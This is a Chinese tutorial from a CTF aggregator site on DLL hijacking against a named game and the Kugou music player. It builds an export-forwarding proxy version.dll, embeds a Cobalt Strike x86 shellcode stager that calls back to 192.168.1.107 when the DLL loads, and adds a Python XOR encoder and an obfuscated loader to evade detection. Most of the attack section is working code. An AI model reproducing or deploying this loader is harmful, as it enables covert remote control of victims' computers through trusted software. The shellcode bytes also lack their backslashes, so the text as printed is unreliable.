CTF导航 CTF导航

dll劫持实例学习

渗透技巧 7个月前 admin
164 0 0

dll劫持的顺序

如果程序需要加载一个相对路径的dll文件,它将从当前目录下尝试查找,如果找不到,则按照如下顺序寻找:

1.加载应用程序的目录
2.系统目录
3.16 位系统目录
4.Windows目录
5.当前目录
6.PATH 环境变量中列出的目录

这里我们拿某游戏倩**魂来测试。

dll劫持实例学习

使用Process Monitor添加过滤器。

dll劫持实例学习

dll劫持实例学习

可以发现有大量dll未找到。使用dumpbin来查看该exe的导入表。我们的dll对应编写导出表。

dll劫持实例学习

可以看到UxTheme.dll,如下。

UxTheme.dll
                5AB964 Import Address Table
                605254 Import Name Table
                     0 time date stamp
                     0 Index of first forwarder reference

                   2B GetThemePartSize
                   40 IsThemeBackgroundPartiallyTransparent
                   3B GetWindowTheme
                   32 GetThemeSysColor
                   1B GetCurrentThemeName
                   22 GetThemeColor
                    A DrawThemeBackground
                    9 CloseThemeData
                   43 OpenThemeData
                   10 DrawThemeText
                    E DrawThemeParentBackground
                   3D IsAppThemed

编写dll,这里我们要对应导入导出的函数。且我们生成的dll和对应的exe版本位数一定要一样。

#include "pch.h"
#include <Windows.h>
#include <stdlib.h>

extern "C" __declspec(dllexport) int GetThemePartSize() {
    return 0;
}
extern "C" __declspec(dllexport) int IsThemeBackgroundPartiallyTransparent() {
    return 0;
}
extern "C" __declspec(dllexport) int GetWindowTheme() {
    return 0;
}
extern "C" __declspec(dllexport) int GetThemeSysColor() {
    return 0;
}
extern "C" __declspec(dllexport) int GetCurrentThemeName() {
    return 0;
}
extern "C" __declspec(dllexport) int GetThemeColor() {
    return 0;
}
extern "C" __declspec(dllexport) int DrawThemeBackground() {
    return 0;
}
extern "C" __declspec(dllexport) int CloseThemeData() {
    return 0;
}
extern "C" __declspec(dllexport) int OpenThemeData() {
    return 0;
}
extern "C" __declspec(dllexport) int DrawThemeText() {
    return 0;
}
extern "C" __declspec(dllexport) int DrawThemeParentBackground() {
    return 0;
}
extern "C" __declspec(dllexport) int IsAppThemed() {
    return 0;
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        system("calc.exe");
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

dll劫持实例学习

接下来我们测试下某音乐软件。

dll劫持实例学习

这里可以看到存在version.dll。在很多时候我们添加dll但是会影响程序正常的运行,所以我们可以通过转发来达到程序正常上线的效果。

dll劫持实例学习

点击生成会生成一个version.cpp文件。

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdlib.h>



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 头文件
#include <Windows.h>
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 导出函数
#pragma comment(linker, "/EXPORT:GetFileVersionInfoA=versionOrg.GetFileVersionInfoA,@1")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoByHandle=versionOrg.GetFileVersionInfoByHandle,@2")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExA=versionOrg.GetFileVersionInfoExA,@3")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExW=versionOrg.GetFileVersionInfoExW,@4")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeA=versionOrg.GetFileVersionInfoSizeA,@5")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExA=versionOrg.GetFileVersionInfoSizeExA,@6")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExW=versionOrg.GetFileVersionInfoSizeExW,@7")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeW=versionOrg.GetFileVersionInfoSizeW,@8")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoW=versionOrg.GetFileVersionInfoW,@9")
#pragma comment(linker, "/EXPORT:VerFindFileA=versionOrg.VerFindFileA,@10")
#pragma comment(linker, "/EXPORT:VerFindFileW=versionOrg.VerFindFileW,@11")
#pragma comment(linker, "/EXPORT:VerInstallFileA=versionOrg.VerInstallFileA,@12")
#pragma comment(linker, "/EXPORT:VerInstallFileW=versionOrg.VerInstallFileW,@13")
#pragma comment(linker, "/EXPORT:VerLanguageNameA=versionOrg.VerLanguageNameA,@14")
#pragma comment(linker, "/EXPORT:VerLanguageNameW=versionOrg.VerLanguageNameW,@15")
#pragma comment(linker, "/EXPORT:VerQueryValueA=versionOrg.VerQueryValueA,@16")
#pragma comment(linker, "/EXPORT:VerQueryValueW=versionOrg.VerQueryValueW,@17")
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        DisableThreadLibraryCalls(hModule);

    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
    }

    return TRUE;
}

version.cpp代码添加到dllmain.cpp。然后把原始的version.cpp也就是C:WindowsSysWOW64version.dll修改名字为versionOrg.dll放在酷狗同目录下。

dll劫持实例学习

可以看到程序正常执行了。

dll劫持实例学习

上线cs。cs生成x86的payload。

修改dll代码为:

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdlib.h>



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 头文件
#include <Windows.h>
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 导出函数
#pragma comment(linker, "/EXPORT:GetFileVersionInfoA=versionOrg.GetFileVersionInfoA,@1")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoByHandle=versionOrg.GetFileVersionInfoByHandle,@2")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExA=versionOrg.GetFileVersionInfoExA,@3")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExW=versionOrg.GetFileVersionInfoExW,@4")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeA=versionOrg.GetFileVersionInfoSizeA,@5")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExA=versionOrg.GetFileVersionInfoSizeExA,@6")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExW=versionOrg.GetFileVersionInfoSizeExW,@7")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeW=versionOrg.GetFileVersionInfoSizeW,@8")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoW=versionOrg.GetFileVersionInfoW,@9")
#pragma comment(linker, "/EXPORT:VerFindFileA=versionOrg.VerFindFileA,@10")
#pragma comment(linker, "/EXPORT:VerFindFileW=versionOrg.VerFindFileW,@11")
#pragma comment(linker, "/EXPORT:VerInstallFileA=versionOrg.VerInstallFileA,@12")
#pragma comment(linker, "/EXPORT:VerInstallFileW=versionOrg.VerInstallFileW,@13")
#pragma comment(linker, "/EXPORT:VerLanguageNameA=versionOrg.VerLanguageNameA,@14")
#pragma comment(linker, "/EXPORT:VerLanguageNameW=versionOrg.VerLanguageNameW,@15")
#pragma comment(linker, "/EXPORT:VerQueryValueA=versionOrg.VerQueryValueA,@16")
#pragma comment(linker, "/EXPORT:VerQueryValueW=versionOrg.VerQueryValueW,@17")
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/* length: 798 bytes */
unsigned char buf[] = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4cx77x26x07xffxd5x31xffx57x57x57x57x57x68x3ax56x79xa7xffxd5xe9x84x00x00x00x5bx31xc9x51x51x6ax03x51x51x68x50x00x00x00x53x50x68x57x89x9fxc6xffxd5xebx70x5bx31xd2x52x68x00x02x40x84x52x52x52x53x52x50x68xebx55x2ex3bxffxd5x89xc6x83xc3x50x31xffx57x57x6axffx53x56x68x2dx06x18x7bxffxd5x85xc0x0fx84xc3x01x00x00x31xffx85xf6x74x04x89xf9xebx09x68xaaxc5xe2x5dxffxd5x89xc1x68x45x21x5ex31xffxd5x31xffx57x6ax07x51x56x50x68xb7x57xe0x0bxffxd5xbfx00x2fx00x00x39xc7x74xb7x31xffxe9x91x01x00x00xe9xc9x01x00x00xe8x8bxffxffxffx2fx6ax34x6fx4fx00xabx2ax47xd3x0dxfex53xabxf7x18xdbxa4xa3x16x40x86xe2x91x3axb0x3ex20x14x11xcax25xd4xd6x56x00x26x9ax58x45x72xc0xe9xefxb2x0bx92x0bx5ax7exd5xe5xbcx7exe9xbaxc8xc9x5bx8fx1exebxcbx7fx0dx9bx10x91x2bxa9xcbxcex8bx53xd1xa1x36xc9x07x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x39x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex30x3bx20x54x72x69x64x65x6ex74x2fx35x2ex30x3bx20x42x4fx49x45x39x3bx45x4ex55x53x29x0dx0ax00x26x2fx04xfax63x8exd7xebxd6x89x1dx54x81x11x80xf7xd2x94xb4x19x33xe9x1fxd5xa3x07x3axe1x78x28xecxfaxddxbbx9dx5ex48xbfxdex20xb5x0cxecxd5xf2x84x6fxd8x1bx72x0ex1dx45x24x98x97xafx4dx2axc1x95x79xd4xf9x54xaex83x2ax32xa3xeexd4xccxf4xd0x55x50xfex27x93x12x57x92xf1x06x59x3fx2dx06xfax19xabx0exf4x2fx52x12x33xc5x9dxc7x6ax77x1fx97x33x1cx6bx90x6ex2cx6dxcfx15x57x5ex5exf6xf7x48x40x81x50x86x07x7axc2x7exfdx70x57x84xc7x0fx0ex6exbbxa2x8exabxb9xabxb7xfcx83xabxc3x56x8cxf4xbaxf4x8ax48x54x93x1cx0fx2axf4xa4x25x67x84x5ex6ax02x04x51x2ax19x65x5fx12xb4xa3xa5x7bxd6xdaxf9xb2xafx73x1ex0cx93x24x16x5ax5bx55x5dx46x11x65x7fxa8x9bx86x1ex29x96x9fx31xb9x6ex57x2cx9cx5dxdfx18x00x68xf0xb5xa2x56xffxd5x6ax40x68x00x10x00x00x68x00x00x40x00x57x68x58xa4x53xe5xffxd5x93xb9x00x00x00x00x01xd9x51x53x89xe7x57x68x00x20x00x00x53x56x68x12x96x89xe2xffxd5x85xc0x74xc6x8bx07x01xc3x85xc0x75xe5x58xc3xe8xa9xfdxffxffx31x39x32x2ex31x36x38x2ex31x2ex31x30x37x00x17x50x65xea";
DWORD WINAPI run(LPVOID lpParameter) {
    void* exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, buf, sizeof buf);
    ((void(*)())exec)();
    return 0;
}
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        CreateThread(NULL, 0, run, NULL, 0, NULL);
        DisableThreadLibraryCalls(hModule);

    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
    }

    return TRUE;
}

成功上线。

dll劫持实例学习

这里再对shellcode进行简单的xor。
python执行

import binascii

def xor():
    shellcode = b"xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4cx77x26x07xffxd5x31xffx57x57x57x57x57x68x3ax56x79xa7xffxd5xe9x84x00x00x00x5bx31xc9x51x51x6ax03x51x51x68x50x00x00x00x53x50x68x57x89x9fxc6xffxd5xebx70x5bx31xd2x52x68x00x02x40x84x52x52x52x53x52x50x68xebx55x2ex3bxffxd5x89xc6x83xc3x50x31xffx57x57x6axffx53x56x68x2dx06x18x7bxffxd5x85xc0x0fx84xc3x01x00x00x31xffx85xf6x74x04x89xf9xebx09x68xaaxc5xe2x5dxffxd5x89xc1x68x45x21x5ex31xffxd5x31xffx57x6ax07x51x56x50x68xb7x57xe0x0bxffxd5xbfx00x2fx00x00x39xc7x74xb7x31xffxe9x91x01x00x00xe9xc9x01x00x00xe8x8bxffxffxffx2fx6ax34x6fx4fx00xabx2ax47xd3x0dxfex53xabxf7x18xdbxa4xa3x16x40x86xe2x91x3axb0x3ex20x14x11xcax25xd4xd6x56x00x26x9ax58x45x72xc0xe9xefxb2x0bx92x0bx5ax7exd5xe5xbcx7exe9xbaxc8xc9x5bx8fx1exebxcbx7fx0dx9bx10x91x2bxa9xcbxcex8bx53xd1xa1x36xc9x07x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x39x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex30x3bx20x54x72x69x64x65x6ex74x2fx35x2ex30x3bx20x42x4fx49x45x39x3bx45x4ex55x53x29x0dx0ax00x26x2fx04xfax63x8exd7xebxd6x89x1dx54x81x11x80xf7xd2x94xb4x19x33xe9x1fxd5xa3x07x3axe1x78x28xecxfaxddxbbx9dx5ex48xbfxdex20xb5x0cxecxd5xf2x84x6fxd8x1bx72x0ex1dx45x24x98x97xafx4dx2axc1x95x79xd4xf9x54xaex83x2ax32xa3xeexd4xccxf4xd0x55x50xfex27x93x12x57x92xf1x06x59x3fx2dx06xfax19xabx0exf4x2fx52x12x33xc5x9dxc7x6ax77x1fx97x33x1cx6bx90x6ex2cx6dxcfx15x57x5ex5exf6xf7x48x40x81x50x86x07x7axc2x7exfdx70x57x84xc7x0fx0ex6exbbxa2x8exabxb9xabxb7xfcx83xabxc3x56x8cxf4xbaxf4x8ax48x54x93x1cx0fx2axf4xa4x25x67x84x5ex6ax02x04x51x2ax19x65x5fx12xb4xa3xa5x7bxd6xdaxf9xb2xafx73x1ex0cx93x24x16x5ax5bx55x5dx46x11x65x7fxa8x9bx86x1ex29x96x9fx31xb9x6ex57x2cx9cx5dxdfx18x00x68xf0xb5xa2x56xffxd5x6ax40x68x00x10x00x00x68x00x00x40x00x57x68x58xa4x53xe5xffxd5x93xb9x00x00x00x00x01xd9x51x53x89xe7x57x68x00x20x00x00x53x56x68x12x96x89xe2xffxd5x85xc0x74xc6x8bx07x01xc3x85xc0x75xe5x58xc3xe8xa9xfdxffxffx31x39x32x2ex31x36x38x2ex31x2ex31x30x37x00x17x50x65xea"
    #对shellcode进行异或加密
    shellcode = binascii.b2a_hex(shellcode).decode('utf-8')
    shellcode = bytearray.fromhex(shellcode)
    for i in range(len(shellcode)):
        print(shellcode[i])
        shellcode[i] ^= 0x20
    shellcode = binascii.b2a_hex(shellcode).decode('utf-8')
    for i in range(len(shellcode)):
            if i % 2 == 0:
                print("\x" + shellcode[i] + shellcode[i + 1], end = '')

if __name__ == '__main__':
    xor()

dll劫持实例学习

修改dll代码为:

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdlib.h>



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 头文件
#include <Windows.h>
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 导出函数
#pragma comment(linker, "/EXPORT:GetFileVersionInfoA=versionOrg.GetFileVersionInfoA,@1")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoByHandle=versionOrg.GetFileVersionInfoByHandle,@2")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExA=versionOrg.GetFileVersionInfoExA,@3")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExW=versionOrg.GetFileVersionInfoExW,@4")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeA=versionOrg.GetFileVersionInfoSizeA,@5")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExA=versionOrg.GetFileVersionInfoSizeExA,@6")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExW=versionOrg.GetFileVersionInfoSizeExW,@7")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeW=versionOrg.GetFileVersionInfoSizeW,@8")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoW=versionOrg.GetFileVersionInfoW,@9")
#pragma comment(linker, "/EXPORT:VerFindFileA=versionOrg.VerFindFileA,@10")
#pragma comment(linker, "/EXPORT:VerFindFileW=versionOrg.VerFindFileW,@11")
#pragma comment(linker, "/EXPORT:VerInstallFileA=versionOrg.VerInstallFileA,@12")
#pragma comment(linker, "/EXPORT:VerInstallFileW=versionOrg.VerInstallFileW,@13")
#pragma comment(linker, "/EXPORT:VerLanguageNameA=versionOrg.VerLanguageNameA,@14")
#pragma comment(linker, "/EXPORT:VerLanguageNameW=versionOrg.VerLanguageNameW,@15")
#pragma comment(linker, "/EXPORT:VerQueryValueA=versionOrg.VerQueryValueA,@16")
#pragma comment(linker, "/EXPORT:VerQueryValueW=versionOrg.VerQueryValueW,@17")
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/* length: 798 bytes */
unsigned char buf[] = "xdcxc8xa9x20x20x20x40xa9xc5x11xf2x44xabx72x10xabx72x2cxabx72x34xabx52x08x2fx97x6ax06x11xdfx11xe0x8cx1cx41x5cx22x0cx00xe1xefx2dx21xe7xc2xd0x72x77xabx72x30xabx62x1cx21xf0xabx60x58xa5xe0x54x6ax21xf0x70xabx68x38xabx78x00x21xf3xc3x1cx69xabx14xabx21xf6x11xdfx11xe0x8cxe1xefx2dx21xe7x18xc0x55xd4x23x5dxd8x1bx5dx04x55xc2x78xabx78x04x21xf3x46xabx2cx6bxabx78x3cx21xf3xabx24xabx21xf0xa9x64x04x04x7bx7bx41x79x7ax71xdfxc0x78x7fx7axabx32xcbxa6x7dx48x4ex45x54x20x48x57x49x4ex49x74x48x6cx57x06x27xdfxf5x11xdfx77x77x77x77x77x48x1ax76x59x87xdfxf5xc9xa4x20x20x20x7bx11xe9x71x71x4ax23x71x71x48x70x20x20x20x73x70x48x77xa9xbfxe6xdfxf5xcbx50x7bx11xf2x72x48x20x22x60xa4x72x72x72x73x72x70x48xcbx75x0ex1bxdfxf5xa9xe6xa3xe3x70x11xdfx77x77x4axdfx73x76x48x0dx26x38x5bxdfxf5xa5xe0x2fxa4xe3x21x20x20x11xdfxa5xd6x54x24xa9xd9xcbx29x48x8axe5xc2x7dxdfxf5xa9xe1x48x65x01x7ex11xdfxf5x11xdfx77x4ax27x71x76x70x48x97x77xc0x2bxdfxf5x9fx20x0fx20x20x19xe7x54x97x11xdfxc9xb1x21x20x20xc9xe9x21x20x20xc8xabxdfxdfxdfx0fx4ax14x4fx6fx20x8bx0ax67xf3x2dxdex73x8bxd7x38xfbx84x83x36x60xa6xc2xb1x1ax90x1ex00x34x31xeax05xf4xf6x76x20x06xbax78x65x52xe0xc9xcfx92x2bxb2x2bx7ax5exf5xc5x9cx5exc9x9axe8xe9x7bxafx3excbxebx5fx2dxbbx30xb1x0bx89xebxeexabx73xf1x81x16xe9x27x20x75x53x45x52x0dx61x47x45x4ex54x1ax00x6dx4fx5ax49x4cx4cx41x0fx15x0ex10x00x08x43x4fx4dx50x41x54x49x42x4cx45x1bx00x6dx73x69x65x00x19x0ex10x1bx00x77x49x4ex44x4fx57x53x00x6ex74x00x16x0ex10x1bx00x74x52x49x44x45x4ex54x0fx15x0ex10x1bx00x62x6fx69x65x19x1bx65x6ex75x73x09x2dx2ax20x06x0fx24xdax43xaexf7xcbxf6xa9x3dx74xa1x31xa0xd7xf2xb4x94x39x13xc9x3fxf5x83x27x1axc1x58x08xccxdaxfdx9bxbdx7ex68x9fxfex00x95x2cxccxf5xd2xa4x4fxf8x3bx52x2ex3dx65x04xb8xb7x8fx6dx0axe1xb5x59xf4xd9x74x8exa3x0ax12x83xcexf4xecxd4xf0x75x70xdex07xb3x32x77xb2xd1x26x79x1fx0dx26xdax39x8bx2exd4x0fx72x32x13xe5xbdxe7x4ax57x3fxb7x13x3cx4bxb0x4ex0cx4dxefx35x77x7ex7exd6xd7x68x60xa1x70xa6x27x5axe2x5exddx50x77xa4xe7x2fx2ex4ex9bx82xaex8bx99x8bx97xdcxa3x8bxe3x76xacxd4x9axd4xaax68x74xb3x3cx2fx0axd4x84x05x47xa4x7ex4ax22x24x71x0ax39x45x7fx32x94x83x85x5bxf6xfaxd9x92x8fx53x3ex2cxb3x04x36x7ax7bx75x7dx66x31x45x5fx88xbbxa6x3ex09xb6xbfx11x99x4ex77x0cxbcx7dxffx38x20x48xd0x95x82x76xdfxf5x4ax60x48x20x30x20x20x48x20x20x60x20x77x48x78x84x73xc5xdfxf5xb3x99x20x20x20x20x21xf9x71x73xa9xc7x77x48x20x00x20x20x73x76x48x32xb6xa9xc2xdfxf5xa5xe0x54xe6xabx27x21xe3xa5xe0x55xc5x78xe3xc8x89xddxdfxdfx11x19x12x0ex11x16x18x0ex11x0ex11x10x17x20x37x70x45xca";
DWORD WINAPI run(LPVOID lpParameter) {
    PVOID shellcode_exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    RtlCopyMemory(shellcode_exec, buf, sizeof buf);
    for (int i = 0; i < sizeof buf; i++)
    {
        ((char*)shellcode_exec)[i] = (((char*)shellcode_exec)[i]) ^ 'x20';
    }
    ((void(*)())shellcode_exec)();
    return 0;
}
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        CreateThread(NULL, 0, run, NULL, 0, NULL);
        DisableThreadLibraryCalls(hModule);

    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
    }

    return TRUE;
}

dll劫持实例学习

dll劫持实例学习

来源:https://xz.aliyun.com/ 感谢【忘川安全

原文始发于微信公众号(衡阳信安):dll劫持实例学习

版权声明:admin 发表于 2023年10月2日 上午12:01。
转载请注明:dll劫持实例学习 | CTF导航

相关文章

Windows应用层实现VmWare穿透读写-实现无签名驱动加载
admin
352
在阅读了220份IDOR漏洞报告后的心得体会
admin
901
Fastcms 代码审计(第一篇)
admin
104
SSH ProxyCommand == unexpected code execution (CVE-2023-51385)
admin
111
NSX-t交换路由
admin
481
数据防泄露技术小结
admin
141

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

CVE-2024-4040
0
見落としがちなURL正規化によるパストラバーサル
0
CVE-2024-21111 – Local Privilege Escalation in Oracle VirtualBox
0
kkFileView文件上传导致远程代码执行漏洞
0
Ghidra RCE 漏洞分析
0
每日安全动态推送(4-29)
0
Jumpserver 数据恢复之所有服务器权限
0
每日安全动态推送(4-28)
0
[代码审计] 某盗U/发卡系统 不知道是几day
0
Cookie-Monster – BOF To Steal Browser Cookies & Credentials
0